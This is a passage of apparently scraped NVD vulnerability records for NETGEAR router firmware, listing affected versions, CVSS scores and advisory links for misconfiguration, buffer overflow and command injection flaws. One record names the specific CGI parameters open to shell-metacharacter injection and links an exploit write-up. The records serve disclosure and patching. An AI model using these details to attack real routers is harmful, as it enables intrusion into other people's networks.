| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "13B4777D-CC2E-4A6B-946F-3E511D8D4B36",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8097CEE-2577-4C44-9260-8B2DD2D2CA78",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AA5CCA76-ED97-4B2E-AB06-9C9F375F7C81",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B94C2A0A-F26B-4CD2-A91E-DD62C5F788B3",
"versionEndExcluding": "1.0.7.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F0C755C-3012-440E-BE85-D98D41F54ED9",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A6BA926B-4B26-4478-837A-A3B2DE734392",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "833A98AF-A4B0-4C68-AACD-6B3F58E64060",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1448301E-26E2-4D7E-ABB1-D8C8C2A11154",
"versionEndExcluding": "1.0.1.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9A6831F5-19C9-4577-9BC0-FD1F2211EC6B",
"versionEndExcluding": "1.0.3.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58EFB06D-AD59-4F40-B6EC-BD3C1BCACE7A",
"versionEndExcluding": "1.0.2.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.0.1.20, R7000 before 1.0.7.10, R7000P before 1.0.0.58, R6900P before 1.0.0.58, R7100LG before 1.0.0.32, R7900 before 1.0.1.14, R8000 before 1.0.3.22, and R8500 before 1.0.2.94."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una configuraci\u00f3n incorrecta de los ajustes de seguridad. Esto afecta a R6250 versiones anteriores a 1.0.4.8, R6300v2 versiones anteriores a 1.0.4.8, R6700 versiones anteriores a 1.0.1.20, R7000 versiones anteriores a 1.0.7.10, R7000P versiones anteriores a 1.0.0.58, R6900P versiones anteriores a 1.0.0.58, R7100LG versiones anteriores a 1.0.0.32, R7900 versiones anteriores a 1.0.1.14, R8000 versiones anteriores a 1.0.3.22 y R8500 versiones anteriores a 1.0.2.94."
}
],
"id": "CVE-2017-18741",
"lastModified": "2024-11-21T03:20:48.547",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 4.0,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-23T16:15:12.507",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051514/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-0335"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051514/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-0335"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2022-09-07 19:15
Modified
2024-11-21 07:02
Severity ?
Summary
NETGEAR R6200_V2 firmware versions through R6200v2-V1.0.3.12_10.1.11 and R6300_V2 firmware versions through R6300v2-V1.0.4.52_10.0.93 allow remote authenticated attackers to execute arbitrary command via shell metacharacters in the ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, or ipv6_lan_length parameters.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://r6200v2.com | Broken Link, URL Repurposed | |
| cve@mitre.org | https://github.com/10TG/vulnerabilities/blob/main/Netgear/CVE-2022-30078/CVE-2022-30078.md | Exploit, Third Party Advisory | |
| cve@mitre.org | https://www.netgear.com/about/security/ | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://r6200v2.com | Broken Link, URL Repurposed | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/10TG/vulnerabilities/blob/main/Netgear/CVE-2022-30078/CVE-2022-30078.md | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.netgear.com/about/security/ | Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6200_firmware | * | |
| netgear | r6200 | v2 | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B330F17F-724A-4FF3-9634-0478B396332F",
"versionEndIncluding": "1.0.3.12_10.1.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6200:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "719248B0-BE22-4836-A23E-FE9F7590FB0C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16489CF6-FA8C-4983-BC40-1BF3868536E3",
"versionEndIncluding": "1.0.4.52_10.0.93",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "NETGEAR R6200_V2 firmware versions through R6200v2-V1.0.3.12_10.1.11 and R6300_V2 firmware versions through R6300v2-V1.0.4.52_10.0.93 allow remote authenticated attackers to execute arbitrary command via shell metacharacters in the ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, or ipv6_lan_length parameters."
},
{
"lang": "es",
"value": "Las versiones del firmware NETGEAR versiones R6200_V2 hasta R6200v2-V1.0.3.12_10.1.11 y las versiones del firmware R6300_V2 hasta R6300v2-V1.0.4.52_10.0.93, permiten a atacantes remotos autenticados ejecutar un comando arbitrario por medio de meta caracteres de shell en los par\u00e1metros ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length o ipv6_lan_length"
}
],
"id": "CVE-2022-30078",
"lastModified": "2024-11-21T07:02:10.303",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-09-07T19:15:08.513",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"URL Repurposed"
],
"url": "http://r6200v2.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/10TG/vulnerabilities/blob/main/Netgear/CVE-2022-30078/CVE-2022-30078.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.netgear.com/about/security/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"URL Repurposed"
],
"url": "http://r6200v2.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/10TG/vulnerabilities/blob/main/Netgear/CVE-2022-30078/CVE-2022-30078.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.netgear.com/about/security/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-21 19:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6200v2 before 1.0.3.14, R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.1.1.20, R7000 before 1.0.7.10, R7000P/R6900P before 1.0.0.56, R7100LG before 1.0.0.30, R7900 before 1.0.1.14, R8000 before 1.0.3.22, R8500 before 1.0.2.74, and D8500 before 1.0.3.28.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6200_firmware | * | |
| netgear | r6200 | v2 | |
| netgear | r6250_firmware | * | |
| netgear | r6250 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7000p_firmware | * | |
| netgear | r7000p | - | |
| netgear | r6900p_firmware | * | |
| netgear | r6900p | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | d8500_firmware | * | |
| netgear | d8500 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "943B629F-0088-4DB8-A9A4-F707147614AD",
"versionEndExcluding": "1.0.3.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6200:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "719248B0-BE22-4836-A23E-FE9F7590FB0C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "13B4777D-CC2E-4A6B-946F-3E511D8D4B36",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8097CEE-2577-4C44-9260-8B2DD2D2CA78",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "398A515E-B281-469F-B2E8-1089C1419744",
"versionEndExcluding": "1.1.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B94C2A0A-F26B-4CD2-A91E-DD62C5F788B3",
"versionEndExcluding": "1.0.7.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ADFE7176-BD34-467C-A167-E869E04A8E97",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2E9EF43B-2542-44CE-A1D6-DECCCFBC1F5F",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E202CB57-DC15-49BA-9059-0847732D5D64",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1448301E-26E2-4D7E-ABB1-D8C8C2A11154",
"versionEndExcluding": "1.0.1.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9A6831F5-19C9-4577-9BC0-FD1F2211EC6B",
"versionEndExcluding": "1.0.3.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC34CE8E-8DB9-4A15-80D8-EB663482A892",
"versionEndExcluding": "1.0.2.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "71CD35FC-2F4A-40C7-A6D4-0E67C1262314",
"versionEndExcluding": "1.0.3.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6200v2 before 1.0.3.14, R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.1.1.20, R7000 before 1.0.7.10, R7000P/R6900P before 1.0.0.56, R7100LG before 1.0.0.30, R7900 before 1.0.1.14, R8000 before 1.0.3.22, R8500 before 1.0.2.74, and D8500 before 1.0.3.28."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una configuraci\u00f3n incorrecta de los ajustes de seguridad. Esto afecta a R6200v2 versiones anteriores a 1.0.3.14, R6250 versiones anteriores a 1.0.4.8, R6300v2 versiones anteriores a 1.0.4.8, R6700 versiones anteriores a 1.1.1.20, R7000 versiones anteriores a 1.0.7.10, R7000P/R6900P versiones anteriores a 1. 0.0.56, R7100LG versiones anteriores a 1.0.0.30, R7900 versiones anteriores a 1.0.1.14, R8000 versiones anteriores a 1.0.3.22, R8500 versiones anteriores a 1.0.2.74, y D8500 versiones anteriores a 1.0.3.28."
}
],
"id": "CVE-2017-18799",
"lastModified": "2024-11-21T03:20:57.243",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-21T19:15:12.427",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049357/Security-Advisory-for-Security-Misconfiguration-Vulnerability-on-D8500-and-Some-Routers-PSV-2017-0528"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049357/Security-Advisory-for-Security-Misconfiguration-Vulnerability-on-D8500-and-Some-Routers-PSV-2017-0528"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-27 15:15
Modified
2024-11-21 04:02
Severity ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D8500 before 1.0.3.42, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300-2CXNAS before 1.0.3.60, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300 before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.18, R8000P before 1.3.0.10, R7900P before 1.3.0.10, R8500 before 1.0.2.122, R8300 before 1.0.2.122, RBW30 before 2.1.2.6, WN2500RPv2 before 1.0.0.54, and WNR3500Lv2 before 1.2.0.56.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "629E89E8-F329-4D11-9652-540752084DD3",
"versionEndExcluding": "1.0.3.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54C9BF9A-F891-4337-AAFF-6E192A81B45B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "74109B25-B64E-4166-A7B0-E3DA87B89161",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
